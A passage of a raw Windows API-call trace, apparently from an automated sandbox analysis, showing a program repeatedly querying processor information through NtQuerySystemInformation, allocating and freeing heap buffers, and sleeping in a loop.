Flags=0x0, Size=0x1000) returned 0x295d900 [0283.261] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0283.261] Sleep (dwMilliseconds=0x110) [0283.294] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d558 [0283.294] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d558, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d558, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0283.296] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d558 | out: hHeap=0x2560000) returned 1 [0283.296] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a9b8 [0283.296] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a9b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a9b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0283.297] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a9b8 | out: hHeap=0x2560000) returned 1 [0283.297] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b770 [0283.297] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b770, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b770, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0283.297] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b770 | out: hHeap=0x2560000) returned 1 [0283.297] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c9c8 [0283.297] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c9c8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c9c8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0283.298] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c9c8 | out: hHeap=0x2560000) returned 1 [0283.298] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0283.298] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0283.298] Sleep (dwMilliseconds=0x110) [0283.316] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0283.316] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0283.317] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0283.317] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a880 [0283.317] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a880, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a880, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0283.318] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a880 | out: hHeap=0x2560000) returned 1 [0283.318] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b640 [0283.318] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b640, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b640, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0283.318] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b640 | out: hHeap=0x2560000) returned 1 [0283.318] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c9c8 [0283.318] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c9c8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c9c8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0283.319] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c9c8 | out: hHeap=0x2560000) returned 1 [0283.319] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0283.319] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0283.319] Sleep (dwMilliseconds=0x110) [0283.329] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0283.329] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0283.330] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0283.330] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a748 [0283.330] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a748, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a748, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0283.331] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a748 | out: hHeap=0x2560000) returned 1 [0283.332] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c350 [0283.332] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c350, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c350, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0283.333] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c350 | out: hHeap=0x2560000) returned 1 [0283.333] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cce8 [0283.333] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cce8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cce8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0283.333] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cce8 | out: hHeap=0x2560000) returned 1 [0283.333] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0283.334] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0283.334] Sleep (dwMilliseconds=0x110) [0283.345] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d558 [0283.345] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d558, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d558, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0283.346] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d558 | out: hHeap=0x2560000) returned 1 [0283.346] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ab58 [0283.346] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ab58, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ab58, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0283.347] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ab58 | out: hHeap=0x2560000) returned 1 [0283.347] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bfc0 [0283.347] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bfc0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bfc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0283.348] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bfc0 | out: hHeap=0x2560000) returned 1 [0283.348] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d198 [0283.348] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d198, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d198, ResultLength=0x19ee88*=0xc0) returned 0x0 [0283.348] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d198 | out: hHeap=0x2560000) returned 1 [0283.348] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0283.349] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0283.349] Sleep (dwMilliseconds=0x110) [0283.375] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d8a0 [0283.375] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d8a0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0283.376] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d8a0 | out: hHeap=0x2560000) returned 1 [0283.376] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a8e8 [0283.376] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a8e8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a8e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0283.376] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a8e8 | out: hHeap=0x2560000) returned 1 [0283.376] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c3e8 [0283.376] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c3e8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c3e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0283.377] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c3e8 | out: hHeap=0x2560000) returned 1 [0283.377] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c900 [0283.377] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c900, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c900, ResultLength=0x19ee88*=0xc0) returned 0x0 [0283.378] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c900 | out: hHeap=0x2560000) returned 1 [0283.378] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0283.378] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0283.378] Sleep (dwMilliseconds=0x110) [0283.665] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0283.665] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0283.665] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0283.665] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aaf0 [0283.665] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aaf0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aaf0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0283.666] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aaf0 | out: hHeap=0x2560000) returned 1 [0283.666] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b938 [0283.666] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b938, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b938, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0283.667] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b938 | out: hHeap=0x2560000) returned 1 [0283.667] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cdb0 [0283.667] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cdb0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cdb0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0283.668] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cdb0 | out: hHeap=0x2560000) returned 1 [0283.668] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0283.668] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0283.676] Sleep (dwMilliseconds=0x110) [0283.684] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0283.684] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0283.685] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0283.689] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a610 [0283.689] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a610, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a610, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0283.690] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a610 | out: hHeap=0x2560000) returned 1 [0283.690] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c2b8 [0283.690] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c2b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c2b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0283.691] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c2b8 | out: hHeap=0x2560000) returned 1 [0283.691] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cf40 [0283.691] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cf40, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cf40, ResultLength=0x19ee88*=0xc0) returned 0x0 [0283.692] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cf40 | out: hHeap=0x2560000) returned 1 [0283.692] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0283.693] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0283.693] Sleep (dwMilliseconds=0x110) [0283.706] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0283.706] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0283.707] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0283.707] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0283.707] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0283.708] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0283.708] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295be90 [0283.708] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295be90, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295be90, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0283.708] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295be90 | out: hHeap=0x2560000) returned 1 [0283.708] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d260 [0283.709] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d260, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d260, ResultLength=0x19ee88*=0xc0) returned 0x0 [0283.709] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d260 | out: hHeap=0x2560000) returned 1 [0283.709] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0283.710] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0283.710] Sleep (dwMilliseconds=0x110) [0283.716] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d830 [0283.716] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d830, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d830, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0283.717] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d830 | out: hHeap=0x2560000) returned 1 [0283.717] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a9b8 [0283.717] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a9b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a9b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0283.717] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a9b8 | out: hHeap=0x2560000) returned 1 [0283.717] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b640 [0283.717] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b640, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b640, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0283.718] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b640 | out: hHeap=0x2560000) returned 1 [0283.718] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cf40 [0283.718] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cf40, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cf40, ResultLength=0x19ee88*=0xc0) returned 0x0 [0283.720] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cf40 | out: hHeap=0x2560000) returned 1 [0283.720] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0283.721] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0283.721] Sleep (dwMilliseconds=0x110) [0283.732] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0283.732] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0283.733] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0283.737] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a7b0 [0283.737] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a7b0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a7b0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0283.738] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a7b0 | out: hHeap=0x2560000) returned 1 [0283.738] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb00 [0283.738] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb00, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb00, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0283.739] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb00 | out: hHeap=0x2560000) returned 1 [0283.739] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ca90 [0283.739] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ca90, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ca90, ResultLength=0x19ee88*=0xc0) returned 0x0 [0283.740] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ca90 | out: hHeap=0x2560000) returned 1 [0283.740] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0283.740] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0283.740] Sleep (dwMilliseconds=0x110) [0283.753] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0283.753] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0283.754] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0283.754] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a610 [0283.754] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a610, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a610, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0283.755] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a610 | out: hHeap=0x2560000) returned 1 [0283.755] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bf28 [0283.755] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bf28, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bf28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0283.756] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bf28 | out: hHeap=0x2560000) returned 1 [0283.757] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c6a8 [0283.757] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c6a8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c6a8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0283.758] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c6a8 | out: hHeap=0x2560000) returned 1 [0283.765] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0283.766] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0283.766] Sleep (dwMilliseconds=0x110) [0283.778] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0283.778] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0283.779] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0283.783] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a8e8 [0283.783] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a8e8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a8e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0283.784] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a8e8 | out: hHeap=0x2560000) returned 1 [0283.784] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295be90 [0283.784] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295be90, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295be90, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0283.784] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295be90 | out: hHeap=0x2560000) returned 1 [0283.784] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c6a8 [0283.784] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c6a8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c6a8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0283.785] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c6a8 | out: hHeap=0x2560000) returned 1 [0283.785] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0283.785] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0283.785] Sleep (dwMilliseconds=0x110) [0283.799] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0283.799] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0283.800] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0283.800] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a8e8 [0283.800] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a8e8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a8e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0283.800] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a8e8 | out: hHeap=0x2560000) returned 1 [0283.800] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bf28 [0283.800] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bf28, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bf28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0283.801] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bf28 | out: hHeap=0x2560000) returned 1 [0283.801] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cc20 [0283.801] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cc20, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cc20, ResultLength=0x19ee88*=0xc0) returned 0x0 [0283.802] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cc20 | out: hHeap=0x2560000) returned 1 [0283.802] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0283.802] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0283.802] Sleep (dwMilliseconds=0x110) [0283.813] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d600 [0283.813] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d600, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d600, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0283.814] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d600 | out: hHeap=0x2560000) returned 1 [0283.814] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a5a8 [0283.814] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a5a8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0283.814] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a5a8 | out: hHeap=0x2560000) returned 1 [0283.814] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb98 [0283.814] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb98, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb98, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0283.815] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb98 | out: hHeap=0x2560000) returned 1 [0283.815] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ce78 [0283.815] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ce78, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ce78, 